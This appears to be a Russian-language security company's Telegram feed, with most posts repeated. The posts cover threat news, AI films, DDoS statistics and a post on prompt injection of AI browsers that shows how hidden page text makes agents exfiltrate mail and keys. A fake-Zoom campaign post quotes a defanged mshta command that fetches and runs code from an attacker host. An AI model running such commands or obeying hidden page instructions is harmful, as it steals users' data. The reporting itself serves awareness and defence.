🔐С Международным днем защиты персональных данных!
28 января — день, который напоминает, что цифровые данные имеют высокую ценность, а их утечка может стоить компаниям репутации, клиентов и миллионов рублей.
✍️В этот день в 1981 году была подписана первая в мире международная конвенция о защите персональных данных — задолго до GDPR (общего регламента о защите данных), утечек и эпохи кибервойн.
Мы в DDoS-Guard каждый день работаем над тем, чтобы цифровые сервисы оставались стабильными и доступными даже в условиях атак и перегрузок — ведь надежность инфраструктуры так же важна, как и защита самих данных.
Берегите свою сетевую инфраструктуру и пользователей — и пусть ваши сервисы работают без простоев💪
28 января — день, который напоминает, что цифровые данные имеют высокую ценность, а их утечка может стоить компаниям репутации, клиентов и миллионов рублей.
✍️В этот день в 1981 году была подписана первая в мире международная конвенция о защите персональных данных — задолго до GDPR (общего регламента о защите данных), утечек и эпохи кибервойн.
Мы в DDoS-Guard каждый день работаем над тем, чтобы цифровые сервисы оставались стабильными и доступными даже в условиях атак и перегрузок — ведь надежность инфраструктуры так же важна, как и защита самих данных.
Берегите свою сетевую инфраструктуру и пользователей — и пусть ваши сервисы работают без простоев💪
❤4🎉3🎃1
🚨Google ликвидировала одну из крупнейших резидентных прокси-сетей в мире — IPIDEA
Google совместно с партнерами ликвидировала IPIDEA — гигантскую инфраструктуру, которую использовали киберпреступники. Сеть обслуживала более 6,1 млн IP-адресов в день, а ее инфраструктуру задействовали 550+ группировок из Китая, Северной Кореи, Ирана и России.
По данным Google Threat Intelligence Group, через IPIDEA шли:
🥷🏿 Взломы корпоративных и SaaS-систем
🥷🏿 Атаки на внутреннюю инфраструктуру компаний
🥷🏿 Массовые password spraying-кампании (распыление паролей)
🥷🏿DDoS-атаки
Google подала иски и добилась отключения десятков доменов — сайт ipidea.io уже недоступен.
IPIDEA — это целая глобальная сеть, в которую входили:
Ipidea, 360 Proxy, 922 Proxy, ABC Proxy, Cherry Proxy, Door VPN, Galleon VPN, Luna Proxy, Radish VPN, Tab Proxy и другие — все управлялись одними и теми же операторами.
Google также выявила:
👉7 400 управляющих серверов
👉 3 000+ Windows-бинарников
👉 600 Android-приложений, связанных с инфраструктурой сети
Отдельно отмечается участие IPIDEA в ботнете BADBOX 2.0, за который Google ранее уже судилась с операторами из Китая.
Google фактически вывела из строя глобальную сеть, через которую преступники и APT-группы получали доступ к миллионам зараженных устройств. Полный отчет с подробностями от самой Google можно прочесть здесь.
Google совместно с партнерами ликвидировала IPIDEA — гигантскую инфраструктуру, которую использовали киберпреступники. Сеть обслуживала более 6,1 млн IP-адресов в день, а ее инфраструктуру задействовали 550+ группировок из Китая, Северной Кореи, Ирана и России.
По данным Google Threat Intelligence Group, через IPIDEA шли:
🥷🏿 Взломы корпоративных и SaaS-систем
🥷🏿 Атаки на внутреннюю инфраструктуру компаний
🥷🏿 Массовые password spraying-кампании (распыление паролей)
🥷🏿DDoS-атаки
Google подала иски и добилась отключения десятков доменов — сайт ipidea.io уже недоступен.
IPIDEA — это целая глобальная сеть, в которую входили:
Ipidea, 360 Proxy, 922 Proxy, ABC Proxy, Cherry Proxy, Door VPN, Galleon VPN, Luna Proxy, Radish VPN, Tab Proxy и другие — все управлялись одними и теми же операторами.
Google также выявила:
👉7 400 управляющих серверов
👉 3 000+ Windows-бинарников
👉 600 Android-приложений, связанных с инфраструктурой сети
Отдельно отмечается участие IPIDEA в ботнете BADBOX 2.0, за который Google ранее уже судилась с операторами из Китая.
Google фактически вывела из строя глобальную сеть, через которую преступники и APT-группы получали доступ к миллионам зараженных устройств. Полный отчет с подробностями от самой Google можно прочесть здесь.
😱3❤1🤔1
🍿К искусственному интеллекту можно относиться по-разному — с интересом, с опаской, с восхищением или с недоверием. Но факт остается фактом: информационное поле о нем сейчас раздуто колоссально! Давайте вернемся в те времена, когда ИИ еще был чем-то из мира фантастики, а люди слышали о нем только из фильмов — задолго до того, как Сэм Альтман запустил свою первую нейросеть.
🎬2001: Космическая одиссея (1968)
В этом фильме корабль управляется сверхумным ИИ по имени HAL 9000. Он знает все о миссии, контролирует каждый шаг экипажа и, кажется, умеет думать и чувствовать. Но когда его логика сталкивается с человеческими действиями, HAL начинает действовать непредсказуемо. Этот фильм до сих пор задает вопрос: можно ли доверять машине, которая умнее тебя?
🎬Бегущий по лезвию (1982) / Бегущий по лезвию 2049 (2017)
Здесь мир будущего, где люди живут бок о бок с репликантами — искусственно созданными людьми с чувствами и памятью, которых используют для работы и развлечений. Главные герои ищут границу между настоящим человеком и машиной. Фильмы исследуют, что значит быть живым и как технологии меняют мораль.
🎬Искусственный разум (2001)
История мальчика-робота, который пытается стать настоящим ребенком, чтобы заслужить любовь родителей. Но члены его семьи — настоящие люди — оказываются неготовыми к последствиям проявления его чувств.
🎬Из машины (2014)
Один программист приезжает в лабораторию, чтобы тестировать нового робота в виде девушки с ИИ на борту. Она кажется живой, умной, обманывает и манипулирует, заставляя задаваться вопросом — кто здесь хозяин, а кто подчиненный? История о том, как тесно переплетаются интеллект, эмоции и контроль в мире машин.
🎬Она (2013)
В этом мире люди уже даже не пишут текст вручную, не читают слова — все это за них делает голосовой ИИ. Главный герой влюбляется в своего голосового ассистента, и чем больше проходит времени, тем безумнее становится проявление этой любви. История очень похожа на то, что происходит сейчас: люди завязывают эмоциональные связи с нейросетями, которые «понимают» их лучше, чем другие люди. Настоятельно рекомендуем к просмотру.
🎬Я робот (2004)
2035 год. Мир полон роботами, живущими среди людей и запрограммированными на выполнение трех законов робототехники, главный из которых гласит: «Робот никогда не должен причинять вред человеку». Однако, расследуя загадочную смерть ученого Альфреда Лэннинга, полицейский Дел Спунер начинает подозревать, что к его гибели может быть причастен робот. А это значит, что человечеству угрожает опасность.
🎬Робот по имени Чаппи (2015)
Фильм с бывшими участниками группы Die Antwoord в главных ролях рассказывает о роботе с искусственным интеллектом, который попадает в безжалостный мир людей. Он быстро впитывает доброту и жестокость, учится делать выбор и отвечать за поступки. Фильм напоминает, что интеллект без окружения не становится личностью.
🎬Симона (S1m0ne) (2002)
История о режиссере, который создает полностью виртуальную актрису, заменяющую всех реальных людей в кино. Симона становится звездой, любимицей публики, но никто не подозревает, что она не существует. Фильм поднимает вопросы о реальности, личности и медиа — а еще забавно показывает, как технологии могут заменить человеческий фактор, не оставляя шанса на «живую» жизнь.
🎬2001: Космическая одиссея (1968)
В этом фильме корабль управляется сверхумным ИИ по имени HAL 9000. Он знает все о миссии, контролирует каждый шаг экипажа и, кажется, умеет думать и чувствовать. Но когда его логика сталкивается с человеческими действиями, HAL начинает действовать непредсказуемо. Этот фильм до сих пор задает вопрос: можно ли доверять машине, которая умнее тебя?
🎬Бегущий по лезвию (1982) / Бегущий по лезвию 2049 (2017)
Здесь мир будущего, где люди живут бок о бок с репликантами — искусственно созданными людьми с чувствами и памятью, которых используют для работы и развлечений. Главные герои ищут границу между настоящим человеком и машиной. Фильмы исследуют, что значит быть живым и как технологии меняют мораль.
🎬Искусственный разум (2001)
История мальчика-робота, который пытается стать настоящим ребенком, чтобы заслужить любовь родителей. Но члены его семьи — настоящие люди — оказываются неготовыми к последствиям проявления его чувств.
🎬Из машины (2014)
Один программист приезжает в лабораторию, чтобы тестировать нового робота в виде девушки с ИИ на борту. Она кажется живой, умной, обманывает и манипулирует, заставляя задаваться вопросом — кто здесь хозяин, а кто подчиненный? История о том, как тесно переплетаются интеллект, эмоции и контроль в мире машин.
🎬Она (2013)
В этом мире люди уже даже не пишут текст вручную, не читают слова — все это за них делает голосовой ИИ. Главный герой влюбляется в своего голосового ассистента, и чем больше проходит времени, тем безумнее становится проявление этой любви. История очень похожа на то, что происходит сейчас: люди завязывают эмоциональные связи с нейросетями, которые «понимают» их лучше, чем другие люди. Настоятельно рекомендуем к просмотру.
🎬Я робот (2004)
2035 год. Мир полон роботами, живущими среди людей и запрограммированными на выполнение трех законов робототехники, главный из которых гласит: «Робот никогда не должен причинять вред человеку». Однако, расследуя загадочную смерть ученого Альфреда Лэннинга, полицейский Дел Спунер начинает подозревать, что к его гибели может быть причастен робот. А это значит, что человечеству угрожает опасность.
🎬Робот по имени Чаппи (2015)
Фильм с бывшими участниками группы Die Antwoord в главных ролях рассказывает о роботе с искусственным интеллектом, который попадает в безжалостный мир людей. Он быстро впитывает доброту и жестокость, учится делать выбор и отвечать за поступки. Фильм напоминает, что интеллект без окружения не становится личностью.
🎬Симона (S1m0ne) (2002)
История о режиссере, который создает полностью виртуальную актрису, заменяющую всех реальных людей в кино. Симона становится звездой, любимицей публики, но никто не подозревает, что она не существует. Фильм поднимает вопросы о реальности, личности и медиа — а еще забавно показывает, как технологии могут заменить человеческий фактор, не оставляя шанса на «живую» жизнь.
🔥4❤2👍1
Хакеры блокируют автомобили, IoT-ботнеты захватывают миллионы устройств, Microsoft делится ключами шифрования, а авиакомпании уходят в ручной режим😬
Собрали главные киберсобытия января в карточках выше 👆
Собрали главные киберсобытия января в карточках выше 👆
😱2
50 лет Apple и Microsoft: история «заклятых друзей» 😈
🍏⚔️💻Судебные войны, заимствования технологий, неожиданные сделки и та самая встреча Билла Гейтса и Стива Джобса на сцене в 2007-м, за которой стояла длинная и сложная история отношений, сформировавшая весь IT-мир.
В честь 50-летия Apple и Microsoft и 15 лет со дня смерти Стива Джобса разобрали их противостояние без мифов и фантазий — как две абсолютно разные стратегии привели к одному результату: технологическому доминированию.
👉 Подробно обо всем — в нашей статье на Хабре: https://habr.com/ru/companies/ddosguard/articles/991952/
🍏⚔️💻Судебные войны, заимствования технологий, неожиданные сделки и та самая встреча Билла Гейтса и Стива Джобса на сцене в 2007-м, за которой стояла длинная и сложная история отношений, сформировавшая весь IT-мир.
В честь 50-летия Apple и Microsoft и 15 лет со дня смерти Стива Джобса разобрали их противостояние без мифов и фантазий — как две абсолютно разные стратегии привели к одному результату: технологическому доминированию.
👉 Подробно обо всем — в нашей статье на Хабре: https://habr.com/ru/companies/ddosguard/articles/991952/
Хабр
50 лет Apple и Microsoft: две стратегии вечных frenemies Гейтса и Джобса
Билл Гейтс и Стив Джобс. Стив Джобс и Билл Гейтс. Два гения, построивших миллиардные корпорации, чьи изобретения изменили историю человечества. Те, кто помоложе, помнят их вдвоем по породившей...
❤4👍3
🌨Россию завалило снегом, на Камчатке сугробы доходят до второго этажа, а Мурманск почти трое суток провел без света и тепла после обрушения ЛЭП из-за обледенения и метелей. Но мало кто знает, что тепло может исчезнуть из-за кибератаки. В 2016 году в Финляндии так и произошло.
В Лаппеенранте жители многоквартирных домов на несколько дней остались без отопления и горячей воды. Системы, управлявшие центральным отоплением и циркуляцией горячей воды, вышли из строя после DDoS-атаки, которая длилась почти неделю🥶
Серверы, управлявшие «умным» отоплением, входили в бесконечный цикл перезагрузки. Тепло удалось вернуть только после полного отключения автоматических систем и подачи воды в обход «умного» управления.
Какой ботнет атаковал системы отопления — неизвестно. Но в том же году всем известный Mirai лишил интернета целую страну — Либерию. Ее жители пользуются сетью, подключенной всего одним подводным кабелем с пропускной способностью 5.1 Тбит/с. Мощности Mirai оказалось достаточно, чтобы вывести из строя магистральных провайдеров страны.
В Лаппеенранте жители многоквартирных домов на несколько дней остались без отопления и горячей воды. Системы, управлявшие центральным отоплением и циркуляцией горячей воды, вышли из строя после DDoS-атаки, которая длилась почти неделю🥶
Серверы, управлявшие «умным» отоплением, входили в бесконечный цикл перезагрузки. Тепло удалось вернуть только после полного отключения автоматических систем и подачи воды в обход «умного» управления.
Какой ботнет атаковал системы отопления — неизвестно. Но в том же году всем известный Mirai лишил интернета целую страну — Либерию. Ее жители пользуются сетью, подключенной всего одним подводным кабелем с пропускной способностью 5.1 Тбит/с. Мощности Mirai оказалось достаточно, чтобы вывести из строя магистральных провайдеров страны.
😱5🔥1
Как взломать AI-браузер при помощи обычной веб-страницы🔓
🤖Новые браузеры с AI-агентами — Perplexity Comet, Opera Neon и другие — умеют читать сайты за вас, заполнять формы и выполнять различные действия. У них есть полный доступ к сайтам — точно такой же, как у реального пользователя. Это и дало возможность перехватывать контроль над AI-агентом.
В 2025 году команда разработчиков безопасного браузера Brave спрятала инструкции в теге спойлера на Reddit — и AI-браузер сам вытащил почту пользователя, одноразовый код из Gmail и отправил все атакующему.
Как выглядит атака: злоумышленник прячет команды в контенте страницы ➡️ пользователь просто открывает ее или просит ИИ что-то сделать ➡️ модель воспринимает скрытый текст как инструкцию ➡️ и выполняет действия от имени жертвы — заходит в аккаунты, читает почту, сливает данные.
AI-агенты — новый класс угроз. Например, недавно у хайпового агента Moltbot (ex-Clawdbot) вышел срочный патч безопасности после того, как он всего за 5 минут слил приватный ключ, просто прочитав письмо со скрытым вредоносным промптом. И сколько еще способов перехвата управления найдут злоумышленники — остается только гадать.
🤖Новые браузеры с AI-агентами — Perplexity Comet, Opera Neon и другие — умеют читать сайты за вас, заполнять формы и выполнять различные действия. У них есть полный доступ к сайтам — точно такой же, как у реального пользователя. Это и дало возможность перехватывать контроль над AI-агентом.
В 2025 году команда разработчиков безопасного браузера Brave спрятала инструкции в теге спойлера на Reddit — и AI-браузер сам вытащил почту пользователя, одноразовый код из Gmail и отправил все атакующему.
Как выглядит атака: злоумышленник прячет команды в контенте страницы ➡️ пользователь просто открывает ее или просит ИИ что-то сделать ➡️ модель воспринимает скрытый текст как инструкцию ➡️ и выполняет действия от имени жертвы — заходит в аккаунты, читает почту, сливает данные.
AI-агенты — новый класс угроз. Например, недавно у хайпового агента Moltbot (ex-Clawdbot) вышел срочный патч безопасности после того, как он всего за 5 минут слил приватный ключ, просто прочитав письмо со скрытым вредоносным промптом. И сколько еще способов перехвата управления найдут злоумышленники — остается только гадать.
😱3
🐞Массовая вирусная кампания: заражены сотни тысяч компьютеров
Специалисты по кибербезопасности зафиксировали активное распространение вредоноса RenEngine через пиратские версии популярных игр. С октября 2025 по январь 2026 года вирус заразил более 400 000 компьютеров, и ежедневно фиксируется до 10 000 новых случаев. Топ пострадавших стран стран: Индия, США, Бразилия и Россия.
⚠️ Вредонос вшивают прямо в установщики популярных игр
⚠️ Он тайно крадет пароли, данные браузеров и криптокошельков, майнит на видеокарте
⚠️ Дает злоумышленникам удаленный доступ к системе
⚠️ Маскируется под игровые компоненты, из-за чего не определяется антивирусами
⚠️ Чаще всего для его устранения требуется полная переустановка Windows
Максимально подробно о новом вирусе — здесь
Специалисты по кибербезопасности зафиксировали активное распространение вредоноса RenEngine через пиратские версии популярных игр. С октября 2025 по январь 2026 года вирус заразил более 400 000 компьютеров, и ежедневно фиксируется до 10 000 новых случаев. Топ пострадавших стран стран: Индия, США, Бразилия и Россия.
⚠️ Вредонос вшивают прямо в установщики популярных игр
⚠️ Он тайно крадет пароли, данные браузеров и криптокошельков, майнит на видеокарте
⚠️ Дает злоумышленникам удаленный доступ к системе
⚠️ Маскируется под игровые компоненты, из-за чего не определяется антивирусами
⚠️ Чаще всего для его устранения требуется полная переустановка Windows
Максимально подробно о новом вирусе — здесь
😱6👀1
Северокорейские хакеры атакуют крипторынок через фейковые Zoom-звонки 📞
Пока одни компании вливают миллионы в ИИ ради усиления киберзащиты, северокорейские хакеры используют те же технологии для фишинга.
Северокорейская группировка UNC1069 атакует криптокомпании и инвесторов. Для максимального доверия они генерируют изображения видео при помощи Gemini и модели GTP-4o с известными жертве людьми — предпринимателями, инвесторами или медийными фигурами из криптосреды.
Сама цепочка заражения давно знакома рынку, но теперь она работает заметно эффективнее за счет ИИ:
1️⃣ Сообщение в Telegram от имени венчурных фондов или стартаперов, иногда с взломанных реальных аккаунтов
2️⃣ Приглашение на созвон через Calendly и ссылка на фейковый Zoom
3️⃣ «Звонок» с заранее записанным или сгенерированным видео
4️⃣ Затем классический шаблон «ошибки со звуком/видео» и команда для «исправления», которая заражает систему
Сама команда не вызывает подозрений, потому что она выглядит как легитимная, кроме третьей строчки:
Вредоносное ПО заточено под Windows и macOS — крадет пароли, куки, ключи, данные браузеров, получает доступ к iCloud Keychain и Telegram, а также устанавливает бэкдоры для удаленного управления системой.
Google и Kaspersky отмечают, что эта кампания стала одной из самых технологически насыщенных атак на Web3-сектор за последнее время.
Пока одни компании вливают миллионы в ИИ ради усиления киберзащиты, северокорейские хакеры используют те же технологии для фишинга.
Северокорейская группировка UNC1069 атакует криптокомпании и инвесторов. Для максимального доверия они генерируют изображения видео при помощи Gemini и модели GTP-4o с известными жертве людьми — предпринимателями, инвесторами или медийными фигурами из криптосреды.
Сама цепочка заражения давно знакома рынку, но теперь она работает заметно эффективнее за счет ИИ:
1️⃣ Сообщение в Telegram от имени венчурных фондов или стартаперов, иногда с взломанных реальных аккаунтов
2️⃣ Приглашение на созвон через Calendly и ссылка на фейковый Zoom
3️⃣ «Звонок» с заранее записанным или сгенерированным видео
4️⃣ Затем классический шаблон «ошибки со звуком/видео» и команда для «исправления», которая заражает систему
Сама команда не вызывает подозрений, потому что она выглядит как легитимная, кроме третьей строчки:
setx audio_volume 100 (устанавливает громкость аудио на 100% и создает иллюзию настройки системы)
pnputil /enum-devices /connected /class "Audio" (выводит список подключенных аудиоустройств)
🐞mshta hxxp://mylingocoin[.]com/audio/fix/6454694440 (загружает и исполняет код напрямую с удаленного сервера)
wmic sounddev get Caption, ProductName, DeviceID, Status (выводит информацию о звуковых устройствах)
msdt -id AudioPlaybackDiagnostic (запускает встроенный диагностический мастер Windows — еще один элемент маскировки)
Вредоносное ПО заточено под Windows и macOS — крадет пароли, куки, ключи, данные браузеров, получает доступ к iCloud Keychain и Telegram, а также устанавливает бэкдоры для удаленного управления системой.
Google и Kaspersky отмечают, что эта кампания стала одной из самых технологически насыщенных атак на Web3-сектор за последнее время.
👀5
В начале февраля часть команды DDoS-Guard побывала на IT-конференции LinkMeetUp в Новосибирске.
Неформальная атмосфера мероприятия, как всегда, задала настрой с первых минут. Мы были рады лично пообщаться с нашими клиентами, обсудить профессиональные вопросы со специалистами по сетевым технологиям, а в перерывах между докладами посидеть за ламповыми во всех смыслах мониторами, вспоминая, как играть в Mortal Kombat👾
Новосибирск встретил нас морозным ярким солнцем и белоснежной улыбкой динозавра😁 Спасибо городу и коллегам за дружественный прием. До встречи на будущих мероприятиях!
Неформальная атмосфера мероприятия, как всегда, задала настрой с первых минут. Мы были рады лично пообщаться с нашими клиентами, обсудить профессиональные вопросы со специалистами по сетевым технологиям, а в перерывах между докладами посидеть за ламповыми во всех смыслах мониторами, вспоминая, как играть в Mortal Kombat👾
Новосибирск встретил нас морозным ярким солнцем и белоснежной улыбкой динозавра😁 Спасибо городу и коллегам за дружественный прием. До встречи на будущих мероприятиях!
❤🔥9👍3😁2
📊С середины января фиксируем почти двукратный рост DDoS-атак на образовательные ресурсы и площадки по поиску работы.
Рост по образовательному сегменту совпадает не только с зимней экзаменационной сессией в вузах. Под ударом оказываются и онлайн-платформы с курсами и программами обучения.
После январских праздников традиционно наблюдается всплеск активности пользователей:
👉 Сдача экзаменов и пересдачи
👉 Старт новых учебных потоков
👉 Покупка онлайн-курсов
👉 Желание начать год с освоения новых навыков
С джоб-бордами ситуация менее однозначна. Мы фиксируем существенное увеличение числа атак в сегменте «Работа и образование»
Возможные причины всплеска вредоносной активности:
🤔 Попытки повлиять на продажи размещения вакансий и сопутствующих услуг
🤔 Давление на процессы найма в период оживления рынка труда
🤔 Усложнение пользователям поиска работы
🤔 Конкурирование площадок
Если ваш веб-ресурс тоже начал получать больше «внимания» от злоумышленников, чем хотелось бы — попробуйте защиту от DDoS-атак: тестирование в течение 3-х дней бесплатно.
Рост по образовательному сегменту совпадает не только с зимней экзаменационной сессией в вузах. Под ударом оказываются и онлайн-платформы с курсами и программами обучения.
После январских праздников традиционно наблюдается всплеск активности пользователей:
👉 Сдача экзаменов и пересдачи
👉 Старт новых учебных потоков
👉 Покупка онлайн-курсов
👉 Желание начать год с освоения новых навыков
С джоб-бордами ситуация менее однозначна. Мы фиксируем существенное увеличение числа атак в сегменте «Работа и образование»
Возможные причины всплеска вредоносной активности:
🤔 Попытки повлиять на продажи размещения вакансий и сопутствующих услуг
🤔 Давление на процессы найма в период оживления рынка труда
🤔 Усложнение пользователям поиска работы
🤔 Конкурирование площадок
Если ваш веб-ресурс тоже начал получать больше «внимания» от злоумышленников, чем хотелось бы — попробуйте защиту от DDoS-атак: тестирование в течение 3-х дней бесплатно.
👍6